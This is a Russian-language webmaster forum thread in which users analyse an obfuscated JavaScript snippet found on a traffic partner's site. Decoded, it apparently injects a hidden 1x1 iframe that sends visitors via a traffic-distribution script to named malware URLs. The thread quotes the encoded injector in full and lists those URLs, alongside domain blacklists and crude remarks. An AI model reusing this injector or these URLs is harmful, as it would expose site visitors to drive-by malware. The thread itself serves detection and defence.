Новая тема   Ответить

 net666
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Djgsbnf%2631tsd%264E%2633iuuq%264B00mftcjbot5zpv/ofu0j/qiq%2633%2631xjeui%264E%26332%2633%2631ifjhiu%264E%26332%2633%264F%264D0jgsbnf%264F1')</script>
У одного трейдера нового такую строку нашел.

 goodlover
Раскодированный код можно глянуть тут, если заменить 123 на твой код.
Наибольший интерес вызвала функция dF.
Дальше пока не разбирался...

 Teval
goodlover, нет, там нельзя её раскодировать.

ТС, удаляй трейдера к чертям да и всё. Ясно-понятно что какая то хуета это ненужная. И в паблик героя!

 WorldTraffic
поломали тебя (если это ты на своем ресе нашел), недавно кипишь был, дыра в AT3/ATX, напоминает тот же код

 goodlover
Teval писал:
Я имел ввиду, что это самый лёгкий способ посмотреть, что скрывается под "unescape".
+1 за удалить.

 Teval
Цитата:

так где там раскодировать?
самое умное что пришло ко мне в голову, когда я зашел туда - это вбить этот "текст" в строку поиска
ничего не дало

 intimlife
вот он раскодированый (кроме урла)
Код:

 adminZ
Teval писал:

=)))
что думал гугль скрипты уже раскодирует ?)

 Teval
думал уже дошло до того ))))

 goodlover
Teval писал:
Я привёл эту ссылку, и написал, что вместо "123" (ну от балды написал text=123) нужно вбить весь пост топикстартера кроме последней строчки, т.е. этот подозрительный код. На открывшейся странице смотрим в строку поискового запроса Яндекса - видно всё на нормальном языке, кроме самого главного, выше уже писали что там. Т.е. всего пара движений мышкой, и видим что скрылось под unescape'ом. Надеюсь так понятнее написал.
А как раскодировать самое главное - это хз, самому интересно.

 l0gic
Вот раскодировыйный вариант скрипта:

Код:

результат его работы, одна маленькая строчечка:

Код:
фрейм через "http://robotraff.com/" (http://robotraff.com/tds.php?th=400&thi=400) льет траффик на вири "http://vertuslkj.com/check/upd.php?t=140"

По урлам не кликайтесь, вири

а вообще с самого начало было Teval писал:

 Teval
ну и пробиваем лесбианс4ю нэт:

http://cjlog.com/search.html?q=lesbians4you.net&is_movies=All&a…;niche=All

Other possible trade sites owned by user (42 total)

все в блеклист у кого еще нет

 l0gic


+1

хотябы за один топ лист

01. gayboysclips.net
02. gaylandsfriend.com
03. ts.bisexlist.com

 goodlover
l0gic, расскажи плиз как получился результат его работы? Так, на будущее...

 net666
Вот этот домен...
thebestteens.info

У меня вообще к доменам из зоны инфо было настороженное, теперь просто отрицательное, в баню всех...

 Teval
а у меня все .инфо .моби .биз - в бане по-умолчанию

 l0gic
goodlover писал:

Код:

это под конкретный случай, поймеш не поймеш хз